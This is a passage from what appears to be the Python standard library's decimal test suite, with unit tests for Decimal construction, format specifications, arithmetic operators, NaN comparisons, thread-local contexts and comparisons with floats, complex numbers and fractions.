# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
import locale
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator'
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator'
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
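        # Sketch of that template behaviour, using the values set below: because
        # each new thread's getcontext() starts from a copy of DefaultContext,
        # setting DefaultContext.prec = 24 before th1/th2 start means both threads
        # begin with 24-digit precision, while thfunc2's change to its own thread
        # context (prec = 18) is never seen by thfunc1.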
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
@unittest.skipUnless(threading, 'threading required')
class CThreadingTest(ThreadingTest):
decimal = C
@unittest.skipUnless(threading, 'threading required')
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
        self.assertIs(db.__ge__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
